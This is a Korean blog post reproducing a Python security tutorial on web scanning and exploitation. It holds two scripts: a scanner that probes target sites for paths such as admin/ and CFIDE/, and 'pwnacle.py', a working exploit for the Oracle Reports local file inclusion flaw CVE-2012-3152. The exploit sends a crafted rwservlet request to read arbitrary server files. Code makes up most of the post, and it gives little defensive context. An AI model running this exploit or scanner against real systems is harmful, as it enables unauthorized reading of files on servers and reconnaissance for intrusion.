0w0
[primalsecurity] 0x7 – Web Scanning and Exploitation 본문
Primalsecurity/Primalsecurity_Python-tutorials
[primalsecurity] 0x7 – Web Scanning and Exploitation
0w0 2019. 12. 24. 15:53728x90
반응형
- 타겟에 대한 리소스 스캔닝
- 오라클 제품을 대상으로 LFI (Local File Inclusion) 취약점 익스플로잇
Sling.py
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
|
#####################################
# sling.py - checks for resources #
# Can seach for string in response #
#####################################
from bs4 import BeautifulSoup
import sys, optparse, socket
from urllib import urlopen
class Colors:
RED = '\033[91m'
GREEN = '\033[92m'
def webreq(server, resources): # Function takes in URL, and resources variable which contains the requests
try:
resource = []
for item in open(resources, 'r'): # Loop through the resource file
resource.append(item.strip()) # Append each item in the file to the array
for item in resource: # Loop through the array and create a request for each item in the array
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(5) # set a timeout on the socket connection
url = server.strip()+item.strip() # Format the url variable to store the request: "http://www.site.com/CFIDE/administrator/enter.cfm"
request = urlopen(url) # Make the request
if search: # If the "search" variable is true (-s)
parsed = BeautifulSoup(request.read(), "lxml") # Parse the output with BeautifulSoup
if search in str(parsed): # If the search string is in the output print the next line
print Colors.GREEN+"[+] URL: "+url+" ["+str(request.getcode())+"] Found: '"+search+"' in ouput"
elif request.getcode() == 404: # If we got an HTTP status code
print Colors.RED+"[+] URL: "+url+" ["+str(request.getcode())+"]" # Print the URL and status code
elif request.getcode():
print Colors.GREEN+"[+] URL: "+url+" ["+str(request.getcode())+"]"
except:pass
def main():
# Creates CLI switches and stores in variables
parser = optparse.OptionParser(sys.argv[0]+' '+
'-i <file_with URLs> -r -s [optional]')
parser.add_option('-i', dest='servers', type='string', help='specify target file with URLs')
parser.add_option('-r', dest='resources', type='string', help='specify a file with resources to request')
parser.add_option('-s', dest='search', type='string', help='[optional] Specify a search string -s ')
(options, args) = parser.parse_args()
servers=options.servers
resources=options.resources
global search; search=options.search
if (servers == None) and (resources==None): # Checks to make sure proper CLI switches were given
print parser.usage # if not print usage
sys.exit(0)
if servers:
for server in open(servers, 'r'): # loop through each URL in the file
webreq(server, resources) # Invoke the webreq function
if __name__ == "__main__":
main()
|
Web Scanning ( 웹스캐닝 )
|
1
2
3
4
5
6
7
|
$ python sling.py -h
Usage: sling.py -i <file_with URLs> -r -s [optional]
Options:
-h, --help show this help message and exit
-i SERVERS specify target file with URLs, 타겟 url 목록 가져오기
-r RESOURCES specify a file with resources to request, 요청할 리소스 가져오기
-s SEARCH [optional] Specify a search string -s, 검색 옵션
|
즉,
타겟 url 목록은 ‘http://www.google.com/’ 처럼 한줄 씩 작성되어 있어야함
요청할 리소스 형태도(스캐닝) 한줄 씩 작성되어 있어야함
CFIDE/
admin/
tmp/
-s 옵션 없이 명령 수행
|
1
2
3
4
5
6
7
8
|
$ python sling.py -i URLs -r reqs
|
- s 옵션으로 임의의 출력 조건 주기
|
1
2
3
4
|
|
-s 옵션으로 google 문자열을 주어서 해당 문자열이 포함된 요청의 결과 출력해줌
pwnacle.py
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
|
#######################################
# pwnacle.py - Exploits CVE-2012-3152 #
# Oracle Local File Inclusion (LFI) #
#######################################
import urllib, sys, ssl, inspect
exec inspect.getsource(ssl.wrap_socket).replace("PROTOCOL_SSLv23","PROTOCOL_SSLv3") in dict(inspect.getmembers(ssl.wrap_socket))["func_globals"]
import socket
server = sys.argv[1] # Assigns first argument given at the CLI to 'server' variable
dir = sys.argv[2] # Assigns second argument given at the CLI to 'dir' variable
ip = server.split('/')[2] # formats the server by splitting the string based on the '/' which grabs the IP out of 'http://ip/'
req = '/reports/rwservlet?report=test.rdf+desformat=html+destype=cache+JOBTYPE=rwurl+URLPARAMETER="file:///' #request format to exploit the vulnerability
print "Sending Request: "+server+req+dir+'"'
if 'http://' in server: # Use urllib module for http -- self signed SSL certs caused an exception with urllib
try:
conn = urllib.urlopen(server+req+dir+'"') # Sent the request to the server
out = conn.readlines()
for item in conn:
print item.strip()
except Exception as e:
print e
if 'https://' in server: # Create web request with ssl module
try:
conn = ssl.wrap_socket(socket.create_connection((ip, 443)))
request = 'GET '+req+dir+'"'+' HTTP/1.1'+'n'
request += 'Host: '+ip+'n'
request += 'User-Agent: Mozilla/5.0 '+'n'
request += 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'+'n'
request += 'Accept-Language: en-US,en;q=0.5'+'n'
request += 'Accept-Encoding: gzip, deflate'+'n'
request += 'Connection: keep-alive'+'n'
conn.send(request+'n')
print conn.recv()
print conn.recv(20098)
except Exception as e:
print e
|
728x90
반응형
'Primalsecurity > Primalsecurity_Python-tutorials' 카테고리의 다른 글
| [primalsecurity] 0x9 – Command Automation (0) | 2019.12.31 |
|---|---|
| [primalsecurity] 0x8 – Whois Automation (0) | 2019.12.31 |
| [primalsecurity] 0x6 – Spidering (0) | 2019.12.24 |
| [primalsecurity] 0x5 – Web Requests (0) | 2019.12.24 |
| [primalsecurity] 0x4 – Python to EXE (0) | 2019.12.23 |
'Primalsecurity/Primalsecurity_Python-tutorials' Related Articles
more
Comments